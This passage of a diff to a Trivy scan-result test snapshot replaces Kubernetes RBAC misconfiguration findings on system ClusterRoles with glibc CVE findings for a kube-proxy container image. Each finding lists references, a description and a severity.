"https://avd.aquasec.com/misconfig/ksv050", - ], - }, - "category": "Misconfiguration", - "description": "An effective level of access equivalent to cluster-admin should not be provided.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-admin", - "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", - "name": "Do not allow management of RBAC resources(ClusterRole 'system:aggregate-to-admin' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv050", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/CVE-2019-1010023", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://www.securityfocus.com/bid/109162", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(ClusterRole 'system:aggregate-to-edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:aggregate-to-edit' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:aggregate-to-edit", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:aggregate-to-edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://support.f5.com/csp/article/K06046097", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/CVE-2019-1010025", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:cronjob-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:cronjob-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:deployment-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:deployment-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:endpoint-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpoint-controller", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpoint-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:endpointslice-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslice-controller", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslice-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:endpointslicemirroring-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV056", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv056", - ], - }, - "category": "Misconfiguration", - "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:endpointslicemirroring-controller", - "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", - "name": "Do not allow management of networking resources(ClusterRole 'system:controller:endpointslicemirroring-controller' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv056", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:generic-garbage-collector' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:generic-garbage-collector", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:expand-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:expand-controller", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:job-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", ], }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:job-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "category": "Vulnerability", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka 